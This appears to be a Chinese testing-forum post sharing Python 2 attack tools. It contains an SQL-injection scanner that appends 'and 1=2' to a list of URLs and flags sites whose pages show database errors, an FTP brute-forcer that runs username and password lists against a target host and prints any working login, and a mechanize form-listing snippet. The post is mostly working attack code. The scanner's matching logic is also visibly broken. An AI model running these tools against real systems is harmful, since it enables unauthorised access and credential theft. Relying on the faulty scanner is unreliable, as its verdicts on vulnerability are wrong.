python注入点查找工具 - 51Testing软件测试论坛

import urllib
import os
import sys
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
def usage():
print """
=================SQL INJECTION=====================
Usage:python %s %s
""" %(sys.argv[0],sys.argv[1])
def scanner(url):
try:
page = urllib.urlopen(url).read()
except:
print "[-]Error!!!\n"

复制代码

sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
"[Microsoft][ODBC SQL Server Driver][SQL Server]",
"Warning:ociexecute",
"Warning: pq_query[function.pg-query]:")
i=0
page = str(page.lower())
while i<len(sqls):
sql = str(sqls[i]).lower()
if page.find(sql[i]) == -1:
check=0
else:
check=1
i+=1
if check == 0:
print "[-]"+url+" <No Vulneravel>"
else:
print "[+]"+url+" <Vulneravel>"
def main(args):
if len(args)!=1:
usage()
print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
# print sys.argv[0],sys.argv[1],len(args)
sys.exit(0)
usage()
try:
f = open(str(sys.argv[1]),"r")
urls = f.readlines()
# print urls
except:
print "[+]Error to open the file "+sys.argv[1]+""
return(-1)
f.close()
i=0
while i<len(urls):
if urls[i].find("http://") == -1:
urls[i] = "http://" + urls[i]
urls[i] = urls[i].replace("\n","")
# 利用基本放法进行测试，如：and 1=1，and 1=2，’，查看是否出现sqls中的错误信息
a = scanner(urls[i]+"and 1=2")
i+=1
if __name__ == "__main__":
main(sys.argv[1:])

复制代码

#!/usr/bin/env python
#-*-coding = utf-8-*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@2012-05-08
import sys, os, time
from ftplib import FTP
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : 0.1
[*] ample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
"""
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "\033[31m";
G = "\033[32m";
Y = "\033[33m"
END = "\033[0m"
def logo():
print G+"\n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | 08/05/2012 ftp_bf.py v.0.1 |"
print " | FTP Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|\n"
print " \n [-] %s\n" % time.strftime("%X")
print docs+END
def help():
print R+"[*]-t, --target ip/hostname <> Our target"
print "[*]-u, --usernamelist usernamelist <> usernamelist path"
print "[*]-p, --passwordlist passwordlist <> passwordlist path"
print "[*]-h, --help help <> print this help"
print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
sys.exit(1)
def bf_login(hostname,username,password):
# sys.stdout.write("\r[!]Checking : %s " % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(username, password)
ftp.retrlines('list')
ftp.quit()
print Y+"\n[!] w00t,w00t!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",username, ""
print "[+] Password : ",password, ""+END
return 1
# sys.exit(1)
except Exception, e:
pass
except KeyboardInterrupt:
print R+"\n[-] Exiting ...\n"+END
sys.exit(1)
def anon_login(hostname):
try:
print G+"\n[!] Checking for anonymous login.\n"+END
ftp = FTP(hostname)
ftp.login()
ftp.retrlines('LIST')
print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
ftp.quit()
except Exception, e:
print R+"\n[-] Anonymous login failed...\n"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= 1:
help()
except:
print R+"[-]Cheak your parametars input\n"+END
help()
print G+"[!] BruteForcing target ..."+END
anon_login(hostname)
# print "here is ok"
# print hostname
try:
usernames = open(usernamelist, "r")
user = usernames.readlines()
count1 = 0
while count1 < len(user):
user[count1] = user[count1].strip()
count1 +=1
except:
print R+"\n[-] Cheak your usernamelist path\n"+END
sys.exit(1)
# print "here is ok ",usernamelist,passwordlist
try:
passwords = open(passwordlist, "r")
pwd = passwords.readlines()
count2 = 0
while count2 < len(pwd):
pwd[count2] = pwd[count2].strip()
count2 +=1
except:
print R+"\n[-] Check your passwordlist path\n"+END
sys.exit(1)
print G+"\n[+] Loaded:",len(user),"usernames"
print "\n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] Guessing...\n"+END
for u in user:
for p in pwd:
result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
if result != 1:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
else:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
if not result :
print R+"\n[-]There is no username ans password enabled in the list."
print "[-]Exiting...\n"+END
if __name__ == "__main__":
main()

复制代码

• mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
o any URL can be opened, not just http:
o mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
• Easy HTML form filling.
• Convenient link parsing and following.
• Browser history (.back() and .reload() methods).
• The Referer HTTP header is added properly (optional).
• Automatic observance of robots.txt.
• Automatic handling of HTTP-Equiv and Refresh.

复制代码

br = mechanize.Browser()
response = br.open(sys.argv[1])
for form in br.forms():
print "name:[%r] id:[%r] action:[%s]" %(form.name, form.attrs.get('id'), form.action)
print "Controls: "
for control in form.controls:
print ' ', control.type, control.name, repr(control.value)
print(" ")

复制代码